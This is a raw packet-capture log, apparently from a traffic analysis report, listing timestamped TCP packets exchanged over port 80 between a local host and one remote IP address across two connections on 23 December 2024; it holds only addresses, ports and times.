                                                                                                        Dec 23, 2024 08:39:41.930510998 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.930576086 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.931282043 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.931427002 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.931432009 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.932197094 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.932356119 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.932394028 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.933229923 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.933370113 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.933401108 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.934025049 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.934031963 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.934108973 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.934966087 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.934998989 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.935039043 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.935837984 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.935925007 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.936048031 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.936577082 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.936764002 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.936841011 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.937437057 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.937654018 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.937815905 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.937849998 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.938576937 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.938954115 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.939110994 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.939727068 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.939734936 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.939867020 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.940468073 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.940483093 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.940587997 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.941368103 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.941375971 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.941601992 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.942276955 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.942302942 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.942409039 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.943146944 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.943269014 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.943325996 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.944036961 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.944283009 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.944381952 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.945045948 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.945091963 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.945331097 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.945987940 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.946130037 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.946218967 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.946885109 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.946952105 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.947012901 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.947770119 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.947844028 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.947882891 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.948708057 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.948824883 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.948859930 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.949651003 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.949657917 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.949949980 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.950463057 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.950670004 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.950685024 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.951374054 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.951529026 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.951562881 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.952306032 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.952449083 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.952487946 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.953274012 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.953344107 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.953727007 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.954160929 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.954293013 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.954328060 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.955090046 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.955255032 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.955255032 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.956008911 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.956079960 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.956227064 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.956861973 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.957025051 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.957155943 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.957849026 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.957890034 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.958268881 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.958703041 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.958868980 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.958872080 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.959639072 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.959775925 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.959932089 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.960560083 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.960567951 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.961246967 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.961457968 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.961489916 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.961520910 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.962471008 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.962476969 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.962630033 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.963291883 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.964576960 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.006654978 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.098350048 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.098367929 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.098587990 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.098609924 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.098630905 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.099328995 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.099570036 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.099606991 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.099719048 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.100399017 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.100505114 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.100892067 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.101336956 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.101389885 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.102219105 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.102279902 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.102313995 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.102528095 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.103141069 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.103267908 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.103348017 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.104073048 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.104204893 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.104475021 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.104959965 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.105082035 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.105222940 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.105870962 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.105990887 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.106785059 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.106843948 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.106901884 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.106971979 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.107757092 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.107836008 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.107913971 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.108650923 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.108730078 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.108994961 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.109601974 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.110893965 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.119755030 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.119946957 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.119975090 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.120297909 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.120381117 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.120443106 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.121097088 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.121233940 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.121258974 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.121995926 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.122035027 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.122066975 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.122910023 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.122967005 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.123063087 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.123887062 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.123941898 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.124059916 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.124766111 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.124835968 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.124870062 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.125701904 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.125765085 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.125782013 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.126650095 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.126755953 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.126764059 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.127553940 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.127563000 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.127686977 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.127687931 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.128448963 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.128496885 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.128525972 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.129352093 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.129478931 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.129479885 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.130367994 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.130374908 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.130469084 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.131194115 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.131273985 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.131306887 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.132144928 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.132211924 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.132257938 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.132998943 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.133085966 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.133188009 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.133990049 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.134098053 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.134110928 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.134800911 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.134931087 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.134943008 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.135747910 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.135858059 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.135878086 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.136640072 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.136729956 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.136784077 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.137578964 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.137726068 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.137806892 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.138521910 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.138649940 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.138751984 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.139395952 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.139461994 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.139548063 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.140382051 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.140433073 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.140491962 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.141252995 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.141418934 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.141449928 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.142163038 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.142260075 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.142288923 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.143109083 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.143224955 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.143229008 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.143990993 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.144084930 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.144166946 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.144881010 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.144947052 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.144948006 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.145842075 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.145921946 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.145955086 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.146773100 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.146873951 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.146893978 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.147649050 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.147769928 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.147798061 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.148591995 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.148663998 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.148670912 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.149457932 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.149543047 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.157130957 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.171735048 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.290126085 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:42.505176067 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:42.529297113 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:43.534030914 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:43.653543949 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:43.653767109 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:43.654159069 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:43.773597002 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.155564070 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.155606031 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.155653954 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.155670881 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.155692101 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.155704975 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.155721903 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.155739069 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.155774117 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.155806065 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.155817032 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.155842066 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.155853033 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.155877113 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.155927896 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.275599957 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.275671959 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.275738001 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.364963055 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.365009069 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.365091085 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.369015932 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.369154930 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.369230032 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.377362013 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.377401114 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.377691031 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.385777950 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.385896921 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.386033058 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.394150019 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.394304991 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.394360065 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.402585983 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.402759075 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.402816057 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.410943985 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.411039114 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.411232948 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.419329882 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.419461966 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.419575930 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.427705050 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.427783966 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.427927971 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.436120033 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.436204910 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.436352015 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.444430113 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.444511890 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.444746017 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.574214935 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.574254990 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.574340105 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.575757980 CET8049800139.99.188.124192.168.2.6
